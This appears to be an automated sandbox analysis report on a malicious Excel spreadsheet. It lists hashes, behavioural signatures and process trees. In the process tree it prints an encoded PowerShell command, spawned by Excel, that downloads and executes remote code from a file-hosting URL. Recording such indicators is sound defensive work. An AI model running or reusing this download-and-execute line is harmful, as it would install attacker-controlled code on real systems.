Analysis
-
max time kernel
23s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
01/08/2024, 21:20
Behavioral task
behavioral1
Sample
1a796483c2e648ff0f82c75d7a0b74e71abd66694f555078c9b2b01174b6c2a0.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
1a796483c2e648ff0f82c75d7a0b74e71abd66694f555078c9b2b01174b6c2a0.xls
Resource
win10v2004-20240730-en
General
-
Target
1a796483c2e648ff0f82c75d7a0b74e71abd66694f555078c9b2b01174b6c2a0.xls
-
Size
28KB
-
MD5
f905fbc0693840717343b4651e8d083f
-
SHA1
0f1fcbb144f4e7e20bb46f8b9724ed103e8ec380
-
SHA256
1a796483c2e648ff0f82c75d7a0b74e71abd66694f555078c9b2b01174b6c2a0
-
SHA512
57e219508335656b725157a5f4d84dd7db5cc401bedf76cb22a902149bc8a8d1b52b88306b86e357bfea9b59c291177ff92f3b80380b4d930c9fe685d45840fa
-
SSDEEP
384:i8LDjTPAA6ymev82NsdHLneAjf7OrNCn/WgAdE:rDjLR6dev82NsdHLpf76NWWu
Malware Config
Extracted
https://tmpfiles.org/dl/10333590/exploit.jpg
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2740 2668 powershell.exe 30 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2740 powershell.exe -
Deletes itself 1 IoCs
pid Process 2668 EXCEL.EXE -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\B9077F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2668 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2740 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2668 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2740 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE 2668 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2668 wrote to memory of 2740 2668 EXCEL.EXE 31 PID 2668 wrote to memory of 2740 2668 EXCEL.EXE 31 PID 2668 wrote to memory of 2740 2668 EXCEL.EXE 31 PID 2668 wrote to memory of 2740 2668 EXCEL.EXE 31
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1a796483c2e648ff0f82c75d7a0b74e71abd66694f555078c9b2b01174b6c2a0.xls1⤵
- Deletes itself
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAMAAzADMAMwA1ADkAMAAvAGUAeABwAGwAbwBpAHQALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-